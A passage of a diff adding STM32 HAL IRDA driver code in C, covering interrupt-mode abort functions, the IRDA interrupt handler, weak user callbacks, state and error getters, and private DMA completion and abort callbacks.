abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_IRDA_Abort_IT(IRDA_HandleTypeDef *hirda) +{ + uint32_t AbortCplt = 0x01U; + + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* If DMA Tx and/or DMA Rx Handles are associated to IRDA Handle, DMA Abort complete callbacks should be initialised + before any call to DMA Abort functions */ + /* DMA Tx Handle is valid */ + if (hirda->hdmatx != NULL) + { + /* Set DMA Abort Complete callback if IRDA DMA Tx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT)) + { + hirda->hdmatx->XferAbortCallback = IRDA_DMATxAbortCallback; + } + else + { + hirda->hdmatx->XferAbortCallback = NULL; + } + } + /* DMA Rx Handle is valid */ + if (hirda->hdmarx != NULL) + { + /* Set DMA Abort Complete callback if IRDA DMA Rx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR)) + { + hirda->hdmarx->XferAbortCallback = IRDA_DMARxAbortCallback; + } + else + { + hirda->hdmarx->XferAbortCallback = NULL; + } + } + + /* Disable the IRDA DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT)) + { + /* Disable DMA Tx at IRDA level */ + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + + /* Abort the IRDA DMA Tx channel : use non blocking DMA Abort API (callback) */ + if (hirda->hdmatx != NULL) + { + /* IRDA Tx DMA Abort callback has already been initialised : + will lead to call HAL_IRDA_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hirda->hdmatx) != HAL_OK) + { + hirda->hdmatx->XferAbortCallback = NULL; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* Disable the IRDA DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + /* Abort the IRDA DMA Rx channel : use non blocking DMA Abort API (callback) */ + if (hirda->hdmarx != NULL) + { + /* IRDA Rx DMA Abort callback has already been initialised : + will lead to call HAL_IRDA_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hirda->hdmarx) != HAL_OK) + { + hirda->hdmarx->XferAbortCallback = NULL; + AbortCplt = 0x01U; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* if no DMA abort complete callback execution is required => call user Abort Complete callback */ + if (AbortCplt == 0x01U) + { + /* Reset Tx and Rx transfer counters */ + hirda->TxXferCount = 0x00U; + hirda->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + + /* Restore hirda->gState and hirda->RxState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + hirda->RxState = HAL_IRDA_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + hirda->AbortCpltCallback(hirda); +#else + /* Call legacy weak Abort complete callback */ + HAL_IRDA_AbortCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } + + return HAL_OK; +} + +/** + * @brief Abort ongoing Transmit transfer (Interrupt mode). + * @param hirda IRDA handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable IRDA Interrupts (Tx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_IRDA_AbortTransmit_IT(IRDA_HandleTypeDef *hirda) +{ + /* Disable TXEIE and TCIE interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* Disable the IRDA DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + + /* Abort the IRDA DMA Tx channel : use non blocking DMA Abort API (callback) */ + if (hirda->hdmatx != NULL) + { + /* Set the IRDA DMA Abort callback : + will lead to call HAL_IRDA_AbortCpltCallback() at end of DMA abort procedure */ + hirda->hdmatx->XferAbortCallback = IRDA_DMATxOnlyAbortCallback; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(hirda->hdmatx) != HAL_OK) + { + /* Call Directly hirda->hdmatx->XferAbortCallback function in case of error */ + hirda->hdmatx->XferAbortCallback(hirda->hdmatx); + } + } + else + { + /* Reset Tx transfer counter */ + hirda->TxXferCount = 0x00U; + + /* Restore hirda->gState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + hirda->AbortTransmitCpltCallback(hirda); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_IRDA_AbortTransmitCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } + } + else + { + /* Reset Tx transfer counter */ + hirda->TxXferCount = 0x00U; + + /* Restore hirda->gState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + hirda->AbortTransmitCpltCallback(hirda); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_IRDA_AbortTransmitCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } + + return HAL_OK; +} + +/** + * @brief Abort ongoing Receive transfer (Interrupt mode). + * @param hirda IRDA handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_IRDA_AbortReceive_IT(IRDA_HandleTypeDef *hirda) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Disable the IRDA DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + /* Abort the IRDA DMA Rx channel : use non blocking DMA Abort API (callback) */ + if (hirda->hdmarx != NULL) + { + /* Set the IRDA DMA Abort callback : + will lead to call HAL_IRDA_AbortCpltCallback() at end of DMA abort procedure */ + hirda->hdmarx->XferAbortCallback = IRDA_DMARxOnlyAbortCallback; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hirda->hdmarx) != HAL_OK) + { + /* Call Directly hirda->hdmarx->XferAbortCallback function in case of error */ + hirda->hdmarx->XferAbortCallback(hirda->hdmarx); + } + } + else + { + /* Reset Rx transfer counter */ + hirda->RxXferCount = 0x00U; + + /* Restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + hirda->AbortReceiveCpltCallback(hirda); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_IRDA_AbortReceiveCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } + } + else + { + /* Reset Rx transfer counter */ + hirda->RxXferCount = 0x00U; + + /* Restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + hirda->AbortReceiveCpltCallback(hirda); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_IRDA_AbortReceiveCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } + + return HAL_OK; +} + +/** + * @brief This function handles IRDA interrupt request. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +void HAL_IRDA_IRQHandler(IRDA_HandleTypeDef *hirda) +{ + uint32_t isrflags = READ_REG(hirda->Instance->SR); + uint32_t cr1its = READ_REG(hirda->Instance->CR1); + uint32_t cr3its = READ_REG(hirda->Instance->CR3); + uint32_t errorflags = 0x00U; + uint32_t dmarequest = 0x00U; + + /* If no error occurs */ + errorflags = (isrflags & (uint32_t)(USART_SR_PE | USART_SR_FE | USART_SR_ORE | USART_SR_NE)); + if (errorflags == RESET) + { + /* IRDA in mode Receiver -----------------------------------------------*/ + if (((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + IRDA_Receive_IT(hirda); + return; + } + } + + /* If some errors occur */ + if ((errorflags != RESET) && (((cr3its & USART_CR3_EIE) != RESET) || ((cr1its & (USART_CR1_RXNEIE | USART_CR1_PEIE)) != RESET))) + { + /* IRDA parity error interrupt occurred -------------------------------*/ + if (((isrflags & USART_SR_PE) != RESET) && ((cr1its & USART_CR1_PEIE) != RESET)) + { + hirda->ErrorCode |= HAL_IRDA_ERROR_PE; + } + + /* IRDA noise error interrupt occurred --------------------------------*/ + if (((isrflags & USART_SR_NE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + hirda->ErrorCode |= HAL_IRDA_ERROR_NE; + } + + /* IRDA frame error interrupt occurred --------------------------------*/ + if (((isrflags & USART_SR_FE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + hirda->ErrorCode |= HAL_IRDA_ERROR_FE; + } + + /* IRDA Over-Run interrupt occurred -----------------------------------*/ + if (((isrflags & USART_SR_ORE) != RESET) && (((cr1its & USART_CR1_RXNEIE) != RESET) || ((cr3its & USART_CR3_EIE) != RESET))) + { + hirda->ErrorCode |= HAL_IRDA_ERROR_ORE; + } + /* Call IRDA Error Call back function if need be -----------------------*/ + if (hirda->ErrorCode != HAL_IRDA_ERROR_NONE) + { + /* IRDA in mode Receiver ---------------------------------------------*/ + if (((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + IRDA_Receive_IT(hirda); + } + + /* If Overrun error occurs, or if any error occurs in DMA mode reception, + consider error as blocking */ + dmarequest = HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR); + if (((hirda->ErrorCode & HAL_IRDA_ERROR_ORE) != RESET) || dmarequest) + { + /* Blocking error : transfer is aborted + Set the IRDA state ready to be able to start again the process, + Disable Rx Interrupts, and disable Rx DMA request, if ongoing */ + IRDA_EndRxTransfer(hirda); + + /* Disable the IRDA DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + /* Abort the IRDA DMA Rx channel */ + if (hirda->hdmarx != NULL) + { + /* Set the IRDA DMA Abort callback : + will lead to call HAL_IRDA_ErrorCallback() at end of DMA abort procedure */ + hirda->hdmarx->XferAbortCallback = IRDA_DMAAbortOnError; + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(hirda->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + hirda->hdmarx->XferAbortCallback(hirda->hdmarx); + } + } + else + { +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hirda->ErrorCallback(hirda); +#else + /* Call legacy weak user error callback */ + HAL_IRDA_ErrorCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } + } + else + { +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hirda->ErrorCallback(hirda); +#else + /* Call legacy weak user error callback */ + HAL_IRDA_ErrorCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } + } + else + { + /* Non Blocking error : transfer could go on. + Error is notified to user through user error callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hirda->ErrorCallback(hirda); +#else + /* Call legacy weak user error callback */ + HAL_IRDA_ErrorCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + } + } + return; + } /* End if some error occurs */ + + /* IRDA in mode Transmitter ------------------------------------------------*/ + if (((isrflags & USART_SR_TXE) != RESET) && ((cr1its & USART_CR1_TXEIE) != RESET)) + { + IRDA_Transmit_IT(hirda); + return; + } + + /* IRDA in mode Transmitter end --------------------------------------------*/ + if (((isrflags & USART_SR_TC) != RESET) && ((cr1its & USART_CR1_TCIE) != RESET)) + { + IRDA_EndTransmit_IT(hirda); + return; + } +} + +/** + * @brief Tx Transfer complete callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_TxCpltCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_TxCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief Tx Half Transfer completed callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_IRDA_TxHalfCpltCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_TxHalfCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief Rx Transfer complete callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_RxCpltCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_RxCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief Rx Half Transfer complete callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_RxHalfCpltCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_RxHalfCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief IRDA error callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_ErrorCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_ErrorCallback can be implemented in the user file. + */ +} + +/** + * @brief IRDA Abort Complete callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_AbortCpltCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_AbortCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief IRDA Abort Transmit Complete callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_AbortTransmitCpltCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_AbortTransmitCpltCallback can be implemented in the user file. + */ +} + +/** + * @brief IRDA Abort Receive Complete callback. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_AbortReceiveCpltCallback(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_IRDA_AbortReceiveCpltCallback can be implemented in the user file. + */ +} + +/** + * @} + */ + +/** @defgroup IRDA_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief IRDA State and Errors functions + * +@verbatim + ============================================================================== + ##### Peripheral State and Errors functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to return the State of IrDA + communication process and also return Peripheral Errors occurred during communication process + (+) HAL_IRDA_GetState() API can be helpful to check in run-time the state of the IrDA peripheral. + (+) HAL_IRDA_GetError() check in run-time errors that could be occurred during communication. + +@endverbatim + * @{ + */ + +/** + * @brief Return the IRDA state. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA. + * @retval HAL state + */ +HAL_IRDA_StateTypeDef HAL_IRDA_GetState(IRDA_HandleTypeDef *hirda) +{ + uint32_t temp1 = 0x00U, temp2 = 0x00U; + temp1 = hirda->gState; + temp2 = hirda->RxState; + + return (HAL_IRDA_StateTypeDef)(temp1 | temp2); +} + +/** + * @brief Return the IRDA error code + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA. + * @retval IRDA Error Code + */ +uint32_t HAL_IRDA_GetError(IRDA_HandleTypeDef *hirda) +{ + return hirda->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @defgroup IRDA_Private_Functions IRDA Private Functions + * @{ + */ + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) +/** + * @brief Initialize the callbacks to their default values. + * @param hirda IRDA handle. + * @retval none + */ +void IRDA_InitCallbacksToDefault(IRDA_HandleTypeDef *hirda) +{ + /* Init the IRDA Callback settings */ + hirda->TxHalfCpltCallback = HAL_IRDA_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + hirda->TxCpltCallback = HAL_IRDA_TxCpltCallback; /* Legacy weak TxCpltCallback */ + hirda->RxHalfCpltCallback = HAL_IRDA_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + hirda->RxCpltCallback = HAL_IRDA_RxCpltCallback; /* Legacy weak RxCpltCallback */ + hirda->ErrorCallback = HAL_IRDA_ErrorCallback; /* Legacy weak ErrorCallback */ + hirda->AbortCpltCallback = HAL_IRDA_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + hirda->AbortTransmitCpltCallback = HAL_IRDA_AbortTransmitCpltCallback; /* Legacy weak AbortTransmitCpltCallback */ + hirda->AbortReceiveCpltCallback = HAL_IRDA_AbortReceiveCpltCallback; /* Legacy weak AbortReceiveCpltCallback */ + +} +#endif /* USE_HAL_IRDA_REGISTER_CALLBACKS */ + +/** + * @brief DMA IRDA transmit process complete callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA. + * @retval None + */ +static void IRDA_DMATransmitCplt(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + /* DMA Normal mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) == 0U) + { + hirda->TxXferCount = 0U; + + /* Disable the DMA transfer for transmit request by resetting the DMAT bit + in the IRDA CR3 register */ + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + + /* Enable the IRDA Transmit Complete Interrupt */ + SET_BIT(hirda->Instance->CR1, USART_CR1_TCIE); + } + /* DMA Circular mode */ + else + { +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Tx complete callback */ + hirda->TxCpltCallback(hirda); +#else + /* Call legacy weak Tx complete callback */ + HAL_IRDA_TxCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ + } +} + +/** + * @brief DMA IRDA receive process half complete callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA. + * @retval None + */ +static void IRDA_DMATransmitHalfCplt(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Tx Half complete callback */ + hirda->TxHalfCpltCallback(hirda); +#else + /* Call legacy weak Tx complete callback */ + HAL_IRDA_TxHalfCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief DMA IRDA receive process complete callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA. + * @retval None + */ +static void IRDA_DMAReceiveCplt(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* DMA Normal mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) == 0U) + { + hirda->RxXferCount = 0U; + + /* Disable PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hirda->Instance->CR1, USART_CR1_PEIE); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Disable the DMA transfer for the receiver request by resetting the DMAR bit + in the IRDA CR3 register */ + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + /* At end of Rx process, restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + } + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Rx complete callback */ + hirda->RxCpltCallback(hirda); +#else + /* Call legacy weak Rx complete callback */ + HAL_IRDA_RxCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA IRDA receive process half complete callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA. + * @retval None + */ +static void IRDA_DMAReceiveHalfCplt(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /*Call registered Rx Half complete callback*/ + hirda->RxHalfCpltCallback(hirda); +#else + /* Call legacy weak Rx Half complete callback */ + HAL_IRDA_RxHalfCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief DMA IRDA communication error callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA. + * @retval None + */ +static void IRDA_DMAError(DMA_HandleTypeDef *hdma) +{ + uint32_t dmarequest = 0x00U; + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Stop IRDA DMA Tx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT); + if ((hirda->gState == HAL_IRDA_STATE_BUSY_TX) && dmarequest) + { + hirda->TxXferCount = 0U; + IRDA_EndTxTransfer(hirda); + } + + /* Stop IRDA DMA Rx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR); + if ((hirda->RxState == HAL_IRDA_STATE_BUSY_RX) && dmarequest) + { + hirda->RxXferCount = 0U; + IRDA_EndRxTransfer(hirda); + } + + hirda->ErrorCode |= HAL_IRDA_ERROR_DMA; + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hirda->ErrorCallback(hirda); +#else + /* Call legacy weak user error callback */ + HAL_IRDA_ErrorCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief This function handles IRDA Communication Timeout. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA. + * @param Flag specifies the IRDA flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Tickstart Tick start value + * @param Timeout Timeout duration + * @retval HAL status + */ +static HAL_StatusTypeDef IRDA_WaitOnFlagUntilTimeout(IRDA_HandleTypeDef *hirda, uint32_t Flag, FlagStatus Status, uint32_t Tickstart, uint32_t Timeout) +{ + /* Wait until flag is set */ + while ((__HAL_IRDA_GET_FLAG(hirda, Flag) ? SET : RESET) == Status) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if ((Timeout == 0U) || ((HAL_GetTick() - Tickstart) > Timeout)) + { + /* Disable TXE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts for the interrupt process */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE)); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + hirda->gState = HAL_IRDA_STATE_READY; + hirda->RxState = HAL_IRDA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + return HAL_TIMEOUT; + } + } + } + return HAL_OK; +} + +/** + * @brief End ongoing Tx transfer on IRDA peripheral (following error detection or Transmit completion). + * @param hirda IRDA handle. + * @retval None + */ +static void IRDA_EndTxTransfer(IRDA_HandleTypeDef *hirda) +{ + /* Disable TXEIE and TCIE interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* At end of Tx process, restore hirda->gState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; +} + +/** + * @brief End ongoing Rx transfer on IRDA peripheral (following error detection or Reception completion). + * @param hirda IRDA handle. + * @retval None + */ +static void IRDA_EndRxTransfer(IRDA_HandleTypeDef *hirda) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* At end of Rx process, restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; +} + +/** + * @brief DMA IRDA communication abort callback, when initiated by HAL services on Error + * (To be called at end of DMA Abort procedure following error occurrence). + * @param hdma DMA handle. + * @retval None + */ +static void IRDA_DMAAbortOnError(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + hirda->RxXferCount = 0x00U; + hirda->TxXferCount = 0x00U; + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered user error callback */ + hirda->ErrorCallback(hirda); +#else + /* Call legacy weak user error callback */ + HAL_IRDA_ErrorCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief DMA IRDA Tx communication abort callback, when initiated by user + * (To be called at end of DMA Tx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Rx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void IRDA_DMATxAbortCallback(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + hirda->hdmatx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if (hirda->hdmarx != NULL) + { + if (hirda->hdmarx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + hirda->TxXferCount = 0x00U; + hirda->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + + /* Restore hirda->gState and hirda->RxState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + hirda->RxState = HAL_IRDA_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + hirda->AbortCpltCallback(hirda); +#else + /* Call legacy weak Abort complete callback */ + HAL_IRDA_AbortCpltCallback(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACK */ +} + +/** + * @brief DMA IRDA Rx communication abort callback, when initiated by user + * (To be called at end of DMA Rx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Tx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void IRDA_DMARxAbortCallback(DMA_HandleTypeDef *hdma) +{ + IRDA_HandleTypeDef *hirda = (IRDA_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + 